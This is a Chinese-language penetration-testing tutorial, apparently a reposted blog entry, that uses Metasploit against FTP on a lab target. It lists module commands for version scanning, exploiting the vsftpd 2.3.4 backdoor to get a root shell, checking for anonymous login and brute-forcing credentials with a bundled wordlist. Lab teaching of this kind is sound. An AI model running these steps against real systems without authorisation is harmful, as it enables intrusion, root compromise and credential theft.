目錄
1.查看FTP服務的版本資訊
2.通過FTP拿到root權限
3.ftp匿名登陸掃描
4.ftp暴力破解
1.查看FTP服務的版本資訊
1.打開kali系統的Metasploit軟體,

2.查找模塊 search ftp_version
3.使用模塊 
4.查看需要配置的引數 show options

5.設定目標主機--靶機 set RHOSTS 192.168.0.112

6.run

如圖,我們可以得知ftp的版本號是2.3.4
2.通過FTP拿到root權限
1.查找對應的2.3.4ftp模塊
如圖,我們可以看到一個backdoor的模塊,是一個后門模塊,
2.使用模塊

3. 查看需要配置的引數show options

4.設定目標主機 set RHOSTS 192.168.0.112

5.run

如圖,我們可以看到root,我們已經拿到了root權限,

3.ftp匿名登陸掃描
1.查找模塊 search name:anonymous (anonymous:匿名)

2.使用模塊
3.查找需要配置的引數

4.設定目標主機 set RHOSTS 192.168.0.112

5.run
如圖,我們看到可以連上ftp了,但是是只讀的,我們可以試著去連接一下,

4.ftp暴力破解
我們剛剛只能只讀去鏈接ftp,要想上傳下載讀寫檔案,我們就需要去獲取賬號密碼,
1.查找模塊 search ftp_login

2.使用模塊

3.查找需要配置的引數 show options

4.設定目標主機 set RHOSTS 192.168.0.112

5.設定字典
set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
這個字典是kali自帶的,后面我們可以自己下載一個更強大的字典匯入到kali里面,

6.run

如圖,成功獲取到賬號密碼,
7.通過ftp進行登錄


上傳一個圖片,測驗上傳成功,

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/413280.html
標籤:其他
